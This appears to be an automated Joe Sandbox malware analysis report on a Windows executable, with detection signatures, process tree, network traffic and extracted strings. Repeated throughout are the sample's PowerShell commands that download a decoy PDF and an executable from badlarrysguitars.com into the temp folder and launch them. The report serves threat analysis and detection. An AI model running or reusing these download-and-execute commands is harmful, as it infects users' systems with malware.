Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lg1wwLsmCX.exe

Overview

General Information

Sample name:lg1wwLsmCX.exe
renamed because original name is a hash value
Original sample name:aa278fedf75ca629997113488d789e91f73a275575c22194c7bf7d59b30c9bc9.exe
Analysis ID:1570132
MD5:1ceb5d0cb063290c1f66fccfed96a220
SHA1:09b735e87dd4ef4917d2e1bcd969408c3ac099fd
SHA256:aa278fedf75ca629997113488d789e91f73a275575c22194c7bf7d59b30c9bc9
Tags:badlarrysguitars-comexeuser-JAMESWT_MHT
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Machine Learning detection for sample
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • lg1wwLsmCX.exe (PID: 7660 cmdline: "C:\Users\user\Desktop\lg1wwLsmCX.exe" MD5: 1CEB5D0CB063290C1F66FCCFED96A220)
    • powershell.exe (PID: 7676 cmdline: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf") MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Acrobat.exe (PID: 7924 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\alert.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 8096 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 6304 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2116 --field-trial-handle=1596,i,12408767835003218627,8861379469550011944,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
    • powershell.exe (PID: 1912 cmdline: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe") MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 8164 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), CommandLine: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lg1wwLsmCX.exe", ParentImage: C:\Users\user\Desktop\lg1wwLsmCX.exe, ParentProcessId: 7660, ParentProcessName: lg1wwLsmCX.exe, ProcessCommandLine: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), ProcessId: 7676, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), CommandLine: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lg1wwLsmCX.exe", ParentImage: C:\Users\user\Desktop\lg1wwLsmCX.exe, ParentProcessId: 7660, ParentProcessName: lg1wwLsmCX.exe, ProcessCommandLine: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), ProcessId: 7676, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), CommandLine: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lg1wwLsmCX.exe", ParentImage: C:\Users\user\Desktop\lg1wwLsmCX.exe, ParentProcessId: 7660, ParentProcessName: lg1wwLsmCX.exe, ProcessCommandLine: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), ProcessId: 7676, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8164, ProcessName: svchost.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability
Source: lg1wwLsmCX.exeJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 101.99.75.174:443 -> 192.168.2.9:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 101.99.75.174:443 -> 192.168.2.9:49768 version: TLS 1.2
Source: Binary string: n.pdbbd\ source: powershell.exe, 0000000D.00000002.1635727982.00000236BB983000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 0000000D.00000002.1635091622.00000236BB92E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{3050F24A-98B5-11CF-BB82-00AA00BDCE0B}\LocalServer32 source: powershell.exe, 0000000D.00000002.1629139480.0000022EBA2C7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000000D.00000002.1635969714.00000236BB9C1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 0000000D.00000002.1635727982.00000236BB983000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-11CF-BB82-00AA00BDCE0B}\InprocServer32 source: powershell.exe, 0000000D.00000002.1629139480.0000022EBA2C7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb6 source: powershell.exe, 0000000D.00000002.1635814582.00000236BB989000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: Joe Sandbox ViewIP Address: 50.16.47.176 50.16.47.176
Source: Joe Sandbox ViewASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /share/alert.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: badlarrysguitars.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: OPTIONS /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=US&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1Host: p13n.adobe.ioConnection: keep-aliveAccept: */*Access-Control-Request-Method: GETAccess-Control-Request-Headers: x-adobe-uuid,x-adobe-uuid-type,x-api-keyOrigin: https://rna-resource.acrobat.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Mode: corsSec-Fetch-Site: cross-siteSec-Fetch-Dest: emptyReferer: https://rna-resource.acrobat.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=US&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1Host: p13n.adobe.ioConnection: keep-alivesec-ch-ua: "Chromium";v="105"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01x-adobe-uuid: fdf9e666-cbf4-4e86-8c83-d46a601e2046x-adobe-uuid-type: visitorIdx-api-key: AdobeReader9sec-ch-ua-platform: "Windows"Origin: https://rna-resource.acrobat.comAccept-Language: en-US,en;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rna-resource.acrobat.com/Accept-Encoding: gzip, deflate, br
Source: global trafficHTTP traffic detected: GET /private/nois.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: badlarrysguitars.comConnection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 50.16.47.176
Source: unknownTCP traffic detected without corresponding DNS query: 50.16.47.176
Source: unknownTCP traffic detected without corresponding DNS query: 50.16.47.176
Source: unknownTCP traffic detected without corresponding DNS query: 50.16.47.176
Source: unknownTCP traffic detected without corresponding DNS query: 50.16.47.176
Source: unknownTCP traffic detected without corresponding DNS query: 50.16.47.176
Source: unknownTCP traffic detected without corresponding DNS query: 50.16.47.176
Source: unknownTCP traffic detected without corresponding DNS query: 50.16.47.176
Source: unknownTCP traffic detected without corresponding DNS query: 50.16.47.176
Source: unknownTCP traffic detected without corresponding DNS query: 50.16.47.176
Source: unknownTCP traffic detected without corresponding DNS query: 50.16.47.176
Source: unknownTCP traffic detected without corresponding DNS query: 50.16.47.176
Source: unknownTCP traffic detected without corresponding DNS query: 50.16.47.176
Source: unknownTCP traffic detected without corresponding DNS query: 50.16.47.176
Source: unknownTCP traffic detected without corresponding DNS query: 50.16.47.176
Source: unknownTCP traffic detected without corresponding DNS query: 50.16.47.176
Source: unknownTCP traffic detected without corresponding DNS query: 50.16.47.176
Source: unknownTCP traffic detected without corresponding DNS query: 50.16.47.176
Source: unknownTCP traffic detected without corresponding DNS query: 50.16.47.176
Source: unknownTCP traffic detected without corresponding DNS query: 50.16.47.176
Source: unknownTCP traffic detected without corresponding DNS query: 50.16.47.176
Source: unknownTCP traffic detected without corresponding DNS query: 50.16.47.176
Source: unknownTCP traffic detected without corresponding DNS query: 50.16.47.176
Source: unknownTCP traffic detected without corresponding DNS query: 50.16.47.176
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /share/alert.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: badlarrysguitars.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=US&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1Host: p13n.adobe.ioConnection: keep-alivesec-ch-ua: "Chromium";v="105"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01x-adobe-uuid: fdf9e666-cbf4-4e86-8c83-d46a601e2046x-adobe-uuid-type: visitorIdx-api-key: AdobeReader9sec-ch-ua-platform: "Windows"Origin: https://rna-resource.acrobat.comAccept-Language: en-US,en;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rna-resource.acrobat.com/Accept-Encoding: gzip, deflate, br
Source: global trafficHTTP traffic detected: GET /private/nois.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: badlarrysguitars.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: badlarrysguitars.com
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: powershell.exe, 00000001.00000002.1419880884.0000024F8192E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1561850216.0000022EA3AAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://badlarrysguitars.com
Source: lg1wwLsmCX.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: lg1wwLsmCX.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: lg1wwLsmCX.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: lg1wwLsmCX.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: svchost.exe, 00000006.00000002.2613139359.000001EC4FA8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: lg1wwLsmCX.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: lg1wwLsmCX.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: lg1wwLsmCX.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: lg1wwLsmCX.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: lg1wwLsmCX.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: 77EC63BDA74BD0D0E0426DC8F80085060.5.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.6.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000001.00000002.1493599643.0000024F901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1419880884.0000024F819F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1493599643.0000024F90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1622100254.0000022EB21F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1622100254.0000022EB233A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: lg1wwLsmCX.exeString found in binary or memory: http://ocsp.digicert.com0
Source: lg1wwLsmCX.exeString found in binary or memory: http://ocsp.digicert.com0A
Source: lg1wwLsmCX.exeString found in binary or memory: http://ocsp.digicert.com0C
Source: lg1wwLsmCX.exeString found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 0000000D.00000002.1561850216.0000022EA23B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1419880884.0000024F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1561850216.0000022EA2181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.1561850216.0000022EA23B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lg1wwLsmCX.exeString found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000001.00000002.1506355445.0000024FEBE70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coc
Source: 2D85F72862B55C4EADD9E66E06947F3D0.5.drString found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 00000001.00000002.1419880884.0000024F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1561850216.0000022EA2181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.1419880884.0000024F8169C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1561850216.0000022EA3818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://badlarrysguitars.com
Source: powershell.exe, 0000000D.00000002.1561850216.0000022EA3AD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1561850216.0000022EA3C09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://badlarrysguitars.com/pri
Source: lg1wwLsmCX.exeString found in binary or memory: https://badlarrysguitars.com/private/nois.exe
Source: powershell.exe, 0000000D.00000002.1559532601.0000022EA0250000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1632473413.0000022EBA4B3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1629139480.0000022EBA260000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1560571180.0000022EA04E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1561049909.0000022EA1C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://badlarrysguitars.com/private/nois.exe-OutFile(Join-Path(
Source: powershell.exe, 0000000D.00000002.1559532601.0000022EA02D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://badlarrysguitars.com/private/nois.exej
Source: lg1wwLsmCX.exeString found in binary or memory: https://badlarrysguitars.com/share/alert.pdf
Source: powershell.exe, 00000001.00000002.1501054711.0000024FE9CC8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1502637123.0000024FE9F50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://badlarrysguitars.com/share/alert.pdf-OutFile(Join-Path(
Source: powershell.exe, 00000001.00000002.1506677308.0000024FEBF5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://badlarrysguitars.com/share/alert.pdfll
Source: powershell.exe, 0000000D.00000002.1622100254.0000022EB233A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.1622100254.0000022EB233A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.1622100254.0000022EB233A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 00000006.00000003.1430730460.000001EC4FC00000.00000004.00000800.00020000.00000000.sdmp, edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: powershell.exe, 0000000D.00000002.1561850216.0000022EA23B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1419880884.0000024F81193000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1561850216.0000022EA3641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.1504426551.0000024FEBD0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000001.00000002.1493599643.0000024F901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1419880884.0000024F819F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1493599643.0000024F90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1622100254.0000022EB21F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1622100254.0000022EB233A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: ReaderMessages.4.drString found in binary or memory: https://www.adobe.co
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownHTTPS traffic detected: 101.99.75.174:443 -> 192.168.2.9:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 101.99.75.174:443 -> 192.168.2.9:49768 version: TLS 1.2
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF887CF8C0013_2_00007FF887CF8C00
Source: lg1wwLsmCX.exeStatic PE information: invalid certificate
Source: classification engineClassification label: mal52.winEXE@23/63@3/3
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
